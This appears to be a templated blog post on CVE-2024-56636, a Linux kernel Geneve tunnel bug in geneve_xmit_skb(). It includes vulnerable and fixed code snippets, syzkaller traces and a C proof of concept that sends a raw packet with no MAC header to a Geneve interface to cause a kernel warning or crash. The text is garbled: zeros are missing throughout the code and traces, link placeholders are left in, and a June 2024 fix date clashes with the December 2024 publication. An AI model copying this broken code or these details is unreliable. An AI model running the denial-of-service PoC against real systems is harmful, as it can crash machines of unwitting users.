CVE-2024-56636 - Linux Kernel geneve_xmit_skb() MAC Header Bug Leads to Kernel Warning

A new vulnerability, CVE-2024-56636, has been identified and patched within the Linux kernel's handling of Geneve network tunnels. This bug involves the function geneve_xmit_skb() in the kernel driver, which incorrectly assumes the MAC header of a socket buffer is always set. This can trigger a kernel warning or panic—and might open doors for denial of service attacks under specific conditions.

Let's break it down in easy language, look at the details, and then see how the exploit works.

What is Geneve and geneve_xmit_skb()?

Geneve (Generic Network Virtualization Encapsulation) is a tunneling protocol in Linux, used for creating overlay networks—widely used in modern cloud and container setups. The key job of the geneve_xmit_skb() function is to transmit network packets through a Geneve tunnel.

Normally, network packets in the Linux kernel are managed as sk_buff (socket buffer) structures. These have a field pointing to the start of the link-layer (MAC) header. But, not all code paths guarantee that this header is set correctly.

Insecure Code

The problematic code in geneve_xmit_skb() tried to access the Ethernet header directly using eth_hdr(), which simply assumes the MAC header pointer is valid. If this isn’t set (which can happen in various output paths), the kernel reads random or invalid memory, tripping warnings—potentially even causing a panic in certain builds.

Here’s how the problematic access looked

// Vulnerable snippet
struct ethhdr *eth = eth_hdr(skb); 

This triggers the following kernel warning if the MAC header pointer is garbage

WARNING: CPU:  PID: 11635 at include/linux/skbuff.h:3052 skb_mac_header include/linux/skbuff.h:3052 [inline]
...

Safer Approach

The safe way is to use skb_eth_hdr(), which checks if the MAC header is valid for the buffer before accessing it. Changing the code to use this macro avoids the unsafe assumption:

// Fixed code
struct ethhdr *eth = skb_eth_hdr(skb);

Source of the fix:
- Commit: geneve: do not assume mac header is set in geneve_xmit_skb()
- Maintainers' list for networking in Linux: netdev mailing list patch discussion (replace with real link if publishing)

The Warning

With the vulnerable kernel, syzkaller fuzzing found triggers where socket buffers entered geneve_xmit_skb() without a proper MAC header set. This led to loud kernel warnings like:

RIP: 001:skb_mac_header include/linux/skbuff.h:3052 [inline]
RIP: 001:eth_hdr include/linux/if_ether.h:24 [inline]
RIP: 001:geneve_xmit_skb drivers/net/geneve.c:898 [inline]
RIP: 001:geneve_xmit+x4c38/x573 drivers/net/geneve.c:1039

This might not be *directly* exploitable for full compromise, but it opens a Denial-of-Service (DoS) risk: if an unprivileged user can send crafted packets triggering this path, they could crash or destabilize the system.

Syzkaller Output

The open-source fuzzer syzkaller reported stack traces and register dumps, showing instructions failing as a result of the MAC header bug.

Exploit Details

Goal: Cause a kernel panic or warning by sending crafted packets through a Geneve tunnel, where the skb MAC header is unset.

Proof-of-Concept (PoC)

Below is a conceptual PoC in C, demonstrating how a buggy packet might be generated. (Note: actual network setup will require root privileges to create Geneve interfaces.)

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <arpa/inet.h>

int main() {
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (fd < ) {
        perror("socket");
        return 1;
    }

    // Deliberately send a packet with missing MAC header to geneve tunnel
    char buf[100] = {}; // no mac header filled in
    struct sockaddr_ll sa = {};
    sa.sll_family = AF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = 2; // replace with appropriate Geneve interface index

    int n = sendto(fd, buf, sizeof(buf), , (struct sockaddr*)&sa, sizeof(sa));
    if (n < ) perror("sendto");

    close(fd);
    return ;
}

> Note: For an actual working exploit, the attacker would need control over a Geneve tunnel interface and paths which cause the MAC header to be unset before hitting the geneve_xmit_skb() code.

Mitigation & Patch Status

The fix is merged in Linux kernel mainline. If you use Geneve tunnels, upgrade to a version post June 2024 that includes the patch. Or, backport the commit.

References

- Commit Fix: kernel.org: geneve_xmit_skb() fix
- CVE Record (when posted): CVE-2024-56636 at cve.org
- Kernel Mailing List Thread: lore.kernel.org discussion (insert real link as needed)
- Syzkaller: syzkaller project

TL;DR

CVE-2024-56636 found a bug in Linux Geneve tunnels, where a missing MAC header could trip kernel warnings or cause DoS. The kernel is now fixed—update as soon as you're able if you use Geneve!

Stay safe and keep your Linux systems patched. 🚀

Timeline

Published on: 12/27/2024 15:15:23 UTC
Last modified on: 05/04/2025 10:00:41 UTC